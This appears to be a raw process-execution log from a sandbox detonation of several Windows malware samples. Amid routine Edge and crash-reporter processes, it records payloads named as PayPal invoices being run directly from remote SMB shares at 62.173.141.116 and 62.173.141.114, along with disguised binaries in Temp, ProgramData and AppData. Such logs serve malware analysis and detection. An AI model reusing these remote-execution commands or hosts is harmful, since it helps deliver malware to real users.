C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6c7775460,0x7ff6c7775470,0x7ff6c7775480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 8436 -ip 8436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8436 -s 1532

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2148,9603967266687263428,2319334505721713920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb998346f8,0x7ffb99834708,0x7ffb99834718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4172 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\" -spe -an -ai#7zMap14863:88:7zEvent14707

\??\UNC\62.173.141.116\scarica\paypal_inv.exe

"\\62.173.141.116\scarica\paypal_inv.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1

C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe

"C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe"

C:\Users\Admin\Downloads\2023-11-23-11\0c5a46d8d282d84fc62077f0d955cdb6f5ba7e63e18d51271669e86b9224301a.exe

"C:\Users\Admin\Downloads\2023-11-23-11\0c5a46d8d282d84fc62077f0d955cdb6f5ba7e63e18d51271669e86b9224301a.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 10120 -ip 10120

C:\Users\Admin\Downloads\2023-11-23-11\273a3703b5372321e55b95fd7ef3294ff1e06e6f87efe4deb512074673a2c592.exe

"C:\Users\Admin\Downloads\2023-11-23-11\273a3703b5372321e55b95fd7ef3294ff1e06e6f87efe4deb512074673a2c592.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1012

C:\Users\Admin\Downloads\2023-11-23-11\107732c9883b6616b6c6398234d6e44843de70e8724023d62ca3e908019e58e0.exe

"C:\Users\Admin\Downloads\2023-11-23-11\107732c9883b6616b6c6398234d6e44843de70e8724023d62ca3e908019e58e0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1020

C:\Users\Admin\Downloads\2023-11-23-11\c9ed1cac4d4b557f95dc048dc6eb874ab2f2fb9aa85554bc1ba55e2519234c3e.exe

"C:\Users\Admin\Downloads\2023-11-23-11\c9ed1cac4d4b557f95dc048dc6eb874ab2f2fb9aa85554bc1ba55e2519234c3e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1020

C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe

"C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1212

\??\UNC\62.173.141.114\scarica\InvoicePayPal.exe

"\\62.173.141.114\scarica\InvoicePayPal.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1220

\??\UNC\62.173.141.116\scarica\paypal_inv.exe

"\\62.173.141.116\scarica\paypal_inv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1140

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 8272 -ip 8272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8272 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 10120 -ip 10120

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1164

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1212

C:\Users\Admin\AppData\Roaming\update\explorer.exe

"C:\Users\Admin\AppData\Roaming\update\explorer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 9196 -ip 9196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9196 -s 1376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8572 -ip 8572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8572 -s 604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\2023-11-23-11\english.lang"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6388 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

